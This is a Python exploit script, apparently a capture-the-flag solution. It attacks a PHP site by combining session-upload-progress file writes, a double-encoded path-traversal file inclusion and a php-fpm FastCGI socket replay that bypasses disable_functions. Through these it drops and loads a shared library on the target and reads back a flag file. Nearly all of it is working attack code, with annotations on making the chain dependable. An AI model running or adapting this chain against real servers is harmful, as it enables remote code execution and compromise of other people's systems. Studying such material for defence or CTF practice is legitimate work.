# coded by d4rkstat1c
import requests
from urllib.parse import quote as urlencode
from base64 import b64encode
# Base URL of the target; replace both placeholders before running.
TARGET = 'http://<IP>:<PORT>'
# Raw FastCGI record (base64) that fcgi_gen() has the target replay to
# php-fpm. It is built out-of-band -- per the original note, with
# payload_gen.py and then base64-encoded in CyberChef -- not generated here.
B64_FCGI_PAYLOAD = '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'
# PHPSESSID value used for the session-upload write; PHP stores that session
# as 'sess_' + id, and that file is what the LFI later includes.
SESS_NAME = 'junkid'
SESS_FILE = 'sess_{}'.format(SESS_NAME)
# Names, under /tmp on the target, of the flag to read back and of the
# shared library to drop (the latter is also the local file that is uploaded).
FLAG_FILE = 'flag'
EXT_FILE = 'exec.so'
def read_so(file):
    """Return the base64 encoding (as bytes) of the raw contents of *file*.

    The file is opened in binary mode and encoded without any other
    transformation; the result is meant to be dropped into a PHP
    ``base64_decode("...")`` call (see write_so).

    Args:
        file: path of the local file to read.

    Returns:
        ``bytes`` holding the standard base64 text of the file.
    """
    with open(file, 'rb') as handle:
        raw = handle.read()
    return b64encode(raw)
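def write_tmp(payload, *, timeout=30):
    """Write *payload* into the PHP session file named by SESS_NAME.

    Sends a multipart POST to TARGET with the cookie ``PHPSESSID=SESS_NAME``
    and a ``PHP_SESSION_UPLOAD_PROGRESS`` form field carrying *payload*;
    PHP's session.upload_progress feature then stores that field's value
    inside the session file (``sess_<SESS_NAME>`` under the session save
    path, which the rest of this script assumes is /tmp -- see lfi_gen).

    Args:
        payload: PHP source text to be embedded in the session file.
        timeout: seconds to wait for the target. Added so an unresponsive
            or firewalled host fails instead of hanging the exploit forever.

    Returns:
        The ``requests.Response`` of the POST, so a caller can inspect the
        status code when the write does not seem to land.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    cookies = {'PHPSESSID': SESS_NAME}
    # The file part's content is irrelevant; it only makes the request
    # multipart/form-data, which (presumably) is what makes PHP track the
    # upload and write the progress field into the session.
    files = {'file': b'junk'}
    data = {'PHP_SESSION_UPLOAD_PROGRESS': payload}
    # NOTE(review): with PHP's default session.upload_progress.cleanup=On the
    # session file is removed as soon as the upload completes, so the
    # sequential post-then-include used by the callers may need to be raced
    # against that cleanup -- confirm the target's setting.
    return requests.post(TARGET, cookies=cookies, files=files, data=data,
                         timeout=timeout)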
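def lfi_gen(file, *, target=None, depth=12):
    """Build the LFI URL that makes the target include ``/tmp/<file>``.

    The traversal string is ``'../' * depth + '../tmp/' + file`` and is
    URL-encoded twice, so every slash reaches the server as ``%252F`` --
    presumably because the target decodes the path a second time before
    using it.

    Args:
        file: name of the file under /tmp to include (e.g. ``sess_junkid``).
        target: base URL; defaults to the module-level TARGET.
        depth: number of ``../`` segments placed before the fixed
            ``../tmp/`` part (twelve in the original).

    Returns:
        ``<target>/miner/<double-encoded traversal>``.
    """
    if target is None:
        target = TARGET
    traversal = '../' * depth + '../tmp/' + file
    # Encode '/' as well (quote() keeps it by default). The original passed
    # safe='urlencode' here, which worked only by accident: letters are never
    # escaped anyway, so its sole effect was to drop '/' from the safe set.
    encoded = urlencode(traversal, safe='')
    encoded = urlencode(encoded, safe='')
    return target + '/miner/' + encoded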
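def exploit_lfi(file, *, timeout=30):
    """GET the LFI URL for *file* and return the response body as text.

    Including a PHP file this way runs it on the server; including a plain
    file (such as the flag) simply returns its contents.

    Args:
        file: name under /tmp to include (handed to lfi_gen).
        timeout: seconds to wait for the target, so an unresponsive host
            fails instead of hanging the script.

    Returns:
        ``response.text``. A non-2xx status is not treated as an error, so
        inspect the body if the inclusion appears not to fire.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    url = lfi_gen(file)
    response = requests.get(url, timeout=timeout)
    return response.text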
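def write_so():
    """Stage the shared library on the target as /tmp/EXT_FILE.

    Reads the local EXT_FILE, embeds it base64-encoded in a one-line PHP
    stub (``file_put_contents("/tmp/EXT_FILE", base64_decode(...))``),
    plants that stub in the session file via write_tmp, then includes the
    session file through the LFI so the stub runs and drops the library.

    The whole base64 blob travels inside a single form field of the
    session-upload request, so a large library means a correspondingly
    large request and session file.
    """
    # Honour EXT_FILE for the local read too; the original read a second,
    # hard-coded 'exec.so' here, so changing the constant only affected the
    # remote path.
    b64_so = read_so(EXT_FILE).decode()
    stub = ('<?php file_put_contents("/tmp/{EXT_FILE}", '
            'base64_decode("{b64_so}")); ?>')
    so_payload = stub.format(EXT_FILE=EXT_FILE, b64_so=b64_so)
    # Arbitrary write of the stub, then inclusion to execute it.
    write_tmp(so_payload)
    exploit_lfi(SESS_FILE)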
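def fcgi_gen(b64_fcgi_payload=None, *, sock_path='unix:///run/php-fpm.sock'):
    """Return the PHP stub that replays a raw FastCGI record to php-fpm.

    The stub opens the php-fpm socket with ``stream_socket_client`` and
    writes the base64-decoded record to it. Talking to php-fpm directly is
    what sidesteps ``disable_functions`` in the web-facing PHP config (see
    main); the record itself is built out-of-band (B64_FCGI_PAYLOAD).

    Args:
        b64_fcgi_payload: base64 text of the FastCGI record; defaults to
            the module-level B64_FCGI_PAYLOAD.
        sock_path: php-fpm socket as a PHP stream target. The default is the
            original hard-coded path; confirm it against the target's
            php-fpm ``listen`` setting, since other layouts (e.g. a
            versioned socket under /run/php/ or TCP 127.0.0.1:9000) are common.

    Returns:
        The PHP source as a string. Note the stub neither checks that the
        connect succeeded nor reads php-fpm's reply, so a wrong socket path
        fails silently on the target side.
    """
    if b64_fcgi_payload is None:
        b64_fcgi_payload = B64_FCGI_PAYLOAD
    stub = ('<?php $fp = stream_socket_client("{sock}", $errno, $errstr, 30); '
            'fwrite($fp, base64_decode("{payload}")); ?>')
    return stub.format(sock=sock_path, payload=b64_fcgi_payload)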
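def main():
    """Run the full chain: drop the .so, replay the FastCGI record, read the flag.

    Each step relies on the session-upload write plus the LFI:
      1. write_so() stages /tmp/EXT_FILE on the target.
      2. fcgi_gen() / write_tmp() / exploit_lfi(SESS_FILE) include a stub
         that talks to php-fpm over its socket, bypassing disable_functions;
         per the original author's note, the pre-built FastCGI record is
         expected to load the library, which writes /tmp/FLAG_FILE.
      3. exploit_lfi(FLAG_FILE) reads the flag back through the LFI.

    Refuses to run while TARGET still contains the '<IP>' / '<PORT>'
    placeholders, so a forgotten edit fails loudly rather than with an
    obscure connection error.
    """
    if '<IP>' in TARGET or '<PORT>' in TARGET:
        raise SystemExit('edit TARGET before running: ' + TARGET)
    # Stage the shared library in /tmp on the target.
    write_so()
    # Plant and include the php-fpm stub; this is the disable_functions bypass.
    fcgi_payload = fcgi_gen()
    write_tmp(fcgi_payload)
    exploit_lfi(SESS_FILE)
    # The library's execution is expected to have written /tmp/flag.
    print(exploit_lfi(FLAG_FILE))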
# Script entry point; the module only defines constants and helpers at import
# time, so the functions above can be reused without firing the exploit.
if __name__ == '__main__':
    main()